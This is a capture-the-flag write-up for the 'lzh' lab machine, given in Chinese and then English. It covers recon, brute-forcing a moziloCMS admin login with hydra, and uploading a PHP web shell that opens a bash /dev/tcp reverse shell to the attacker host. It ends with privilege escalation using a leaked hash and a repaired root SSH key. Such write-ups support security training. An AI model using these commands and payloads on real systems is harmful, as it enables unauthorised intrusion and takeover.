mazesec lzh

信息收集

# Nmap 7.95 scan initiated Sun Dec 14 06:38:57 2025 as: /usr/lib/nmap/nmap --privileged -sV -v -sC -oN 192.168.110.133 192.168.110.133
Nmap scan report for Lzh.lan (192.168.110.133)
Host is up (0.0012s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey:
|   3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
|   256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_  256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
80/tcp open  http    Apache httpd 2.4.62 ((Debian))
|_http-server-header: Apache/2.4.62 (Debian)
|_http-title: VisionX | \xE6\x9C\xAA\xE6\x9D\xA5\xE7\xA7\x91\xE6\x8A\x80\xE8\xA7\xA3\xE5\x86\xB3\xE6\x96\xB9\xE6\xA1\x88
| http-methods:
|_  Supported Methods: GET POST OPTIONS HEAD
MAC Address: 08:00:27:D9:88:8A (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Dec 14 06:39:09 2025 -- 1 IP address (1 host up) scanned in 12.33 seconds
# Dirsearch started Sun Dec 14 06:46:14 2025 as: /usr/lib/python3/dist-packages/dirsearch/dirsearch.py -u http://192.168.110.133/

403   280B   http://192.168.110.133/.ht_wsr.txt
403   280B   http://192.168.110.133/.htaccess_extra
403   280B   http://192.168.110.133/.htaccess.orig
403   280B   http://192.168.110.133/.htaccess_sc
403   280B   http://192.168.110.133/.htaccess_orig
403   280B   http://192.168.110.133/.htaccessBAK
403   280B   http://192.168.110.133/.htaccess.sample
403   280B   http://192.168.110.133/.htaccess.bak1
403   280B   http://192.168.110.133/.htaccessOLD2
403   280B   http://192.168.110.133/.htaccessOLD
403   280B   http://192.168.110.133/.htaccess.save
403   280B   http://192.168.110.133/.htm
403   280B   http://192.168.110.133/.htpasswd_test
403   280B   http://192.168.110.133/.html
403   280B   http://192.168.110.133/.httr-oauth
403   280B   http://192.168.110.133/.htpasswds
403   280B   http://192.168.110.133/.php
200     3MB  http://192.168.110.133/backup.zip
403   280B   http://192.168.110.133/server-status/
403   280B   http://192.168.110.133/server-status

漏洞分析

发现backup.zip,是一个备份网站。其中显露出moziloCMS3.0-3.0.1,其漏洞在

1. 以管理员身份登录
2. 通过左侧菜单进入“文件”会话
3. 创建一个包含 PHP Web Shell 内容的 .jpg 文件
4. 通过上传图标将文件上传到服务器并保存
5. 在 Web 服务器上将文件重命名为 .php 并保存
6. 通过以下端点访问 Web Shell:
http://127.0.0.1/mozilo3.0-3.0.1/kategorien/Willkommen/dateien/revshell.php
先转到mozilocms目录
http://192.168.110.133/mozilo/  # 主目录
http://192.168.110.133/mozilo/admin/  # admin登陆页面
# 输入次数多了会出现
Access to mozilo Admin is temporarily blocked.
Incorrect access data has been entered too often. # 输入太多错误访问数据,此时不能输入
// Logindaten überprüfen
// 初始化hash
function checkLoginData($user, $pass) {
    global $loginpassword;
    require_once(BASE_DIR_CMS.'PasswordHash.php');
    $t_hasher = new PasswordHash(8, FALSE);

//检查管理员账号
    if(($user == $loginpassword->get("name")) and (true === $t_hasher->CheckPassword($pass, $loginpassword->get("pw")))) {
        return true;
    } elseif((strlen($loginpassword->get("username")) > 4) and ($user == $loginpassword->get("username")) and (true === $t_hasher->CheckPassword($pass, $loginpassword->get("userpw")))) {
        return true;    //检查备用账号
    } else {
        return false;  //登陆失败返回false
    }
}

前端限制不能输入

<input name="login" id="loginbtn" value="Login" class="mo-login_submit button" type="submit" disabled="">

所以可以暴力破解

hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.110.133 http-post-form "/mozilo/admin/index.php:username=admin&password=^PASS^&login=Login:S=302" -t 64 -I

得到admin:Admin123进入后台

利用

<?php
exec("bash -c 'bash -i >& /dev/tcp/192.168.110.141/4444 0>&1'");
?>

准备payload

根据描述即可获取shell,枚举用户—>welcome

www-data@Lzh:/var/www$ grep -r 'welcome' . 2>/dev/null
./html/mozilo/admin/config.php:    // welcome:3e73d572ba005bb3c02107b2e2fc16f8
./html/mozilo/gpl.txt:    This is free software, and you are welcome to redistribute it

权限提升

在welcome主目录中发现一个id_rsa是属于root的。

但是缺少前三位,这是一个openssh格式的私钥,开头是固定:openssh-key-v1\0

welcome@Lzh:~$ echo -n 'openssh-key-v1' | base64
b3BlbnNzaC1rZXktdjE=

可以进入root了

经验教训

没有仔细阅读注册的源代码,不知道密码政策

mazesec lzh

Information Gathering

# Nmap 7.95 scan initiated Sun Dec 14 06:38:57 2025 as: /usr/lib/nmap/nmap --privileged -sV -v -sC -oN 192.168.110.133 192.168.110.133
Nmap scan report for Lzh.lan (192.168.110.133)
Host is up (0.0012s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey:
|   3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
|   256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_  256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
80/tcp open  http    Apache httpd 2.4.62 ((Debian))
|_http-server-header: Apache/2.4.62 (Debian)
|_http-title: VisionX | \xE6\x9C\xAA\xE6\x9D\xA5\xE7\xA7\x91\xE6\x8A\x80\xE8\xA7\xA3\xE5\x86\xB3\xE6\x96\xB9\xE6\xA1\x88
| http-methods:
|_  Supported Methods: GET POST OPTIONS HEAD
MAC Address: 08:00:27:D9:88:8A (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Dec 14 06:39:09 2025 -- 1 IP address (1 host up) scanned in 12.33 seconds
# Dirsearch started Sun Dec 14 06:46:14 2025 as: /usr/lib/python3/dist-packages/dirsearch/dirsearch.py -u http://192.168.110.133/

403   280B   http://192.168.110.133/.ht_wsr.txt
403   280B   http://192.168.110.133/.htaccess_extra
403   280B   http://192.168.110.133/.htaccess.orig
403   280B   http://192.168.110.133/.htaccess_sc
403   280B   http://192.168.110.133/.htaccess_orig
403   280B   http://192.168.110.133/.htaccessBAK
403   280B   http://192.168.110.133/.htaccess.sample
403   280B   http://192.168.110.133/.htaccess.bak1
403   280B   http://192.168.110.133/.htaccessOLD2
403   280B   http://192.168.110.133/.htaccessOLD
403   280B   http://192.168.110.133/.htaccess.save
403   280B   http://192.168.110.133/.htm
403   280B   http://192.168.110.133/.htpasswd_test
403   280B   http://192.168.110.133/.html
403   280B   http://192.168.110.133/.httr-oauth
403   280B   http://192.168.110.133/.htpasswds
403   280B   http://192.168.110.133/.php
200     3MB  http://192.168.110.133/backup.zip
403   280B   http://192.168.110.133/server-status/
403   280B   http://192.168.110.133/server-status

Vulnerability Analysis

Found backup.zip, which is a website backup. It reveals moziloCMS3.0-3.0.1, whose vulnerability is documented here.

1. Log in as administrator
2. Go to the "Files" session via the left menu
3. Create a .jpg file containing PHP Web Shell content
4. Upload the file to the server via the upload icon and save it
5. Rename the file to .php on the web server and save it
6. Access the Web Shell via the following endpoint:
http://127.0.0.1/mozilo3.0-3.0.1/kategorien/Willkommen/dateien/revshell.php
First navigate to the mozilocms directory
http://192.168.110.133/mozilo/  # Main directory
http://192.168.110.133/mozilo/admin/  # Admin login page
# If you input too many times, the following appears:
Access to mozilo Admin is temporarily blocked.
Incorrect access data has been entered too often. # Too many incorrect access attempts, cannot input now
// Verify login credentials
// Initialize hash
function checkLoginData($user, $pass) {
    global $loginpassword;
    require_once(BASE_DIR_CMS.'PasswordHash.php');
    $t_hasher = new PasswordHash(8, FALSE);

// Check administrator account
    if(($user == $loginpassword->get("name")) and (true === $t_hasher->CheckPassword($pass, $loginpassword->get("pw")))) {
        return true;
    } elseif((strlen($loginpassword->get("username")) > 4) and ($user == $loginpassword->get("username")) and (true === $t_hasher->CheckPassword($pass, $loginpassword->get("userpw")))) {
        return true;    // Check backup account
    } else {
        return false;  // Return false on login failure
    }
}

The frontend disables input:

<input name="login" id="loginbtn" value="Login" class="mo-login_submit button" type="submit" disabled="">

Therefore, brute-forcing is possible:

hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.110.133 http-post-form "/mozilo/admin/index.php:username=admin&password=^PASS^&login=Login:S=302" -t 64 -I

Obtained admin:Admin123 to enter the backend.

Exploitation

<?php
exec("bash -c 'bash -i >& /dev/tcp/192.168.110.141/4444 0>&1'");
?>

Prepare the payload.

Follow the description to obtain a shell, then enumerate users -> welcome.

www-data@Lzh:/var/www$ grep -r 'welcome' . 2>/dev/null
./html/mozilo/admin/config.php:    // welcome:3e73d572ba005bb3c02107b2e2fc16f8
./html/mozilo/gpl.txt:    This is free software, and you are welcome to redistribute it

Privilege Escalation

In the welcome home directory, an id_rsa belonging to root was found.

However, it is missing the first three bytes. This is an OpenSSH format private key, and its header is fixed: openssh-key-v1\0

welcome@Lzh:~$ echo -n 'openssh-key-v1' | base64
b3BlbnNzaC1rZXktdjE=

Now, root access is possible.

Lessons Learned

Did not carefully read the registration source code and was unaware of the password policy.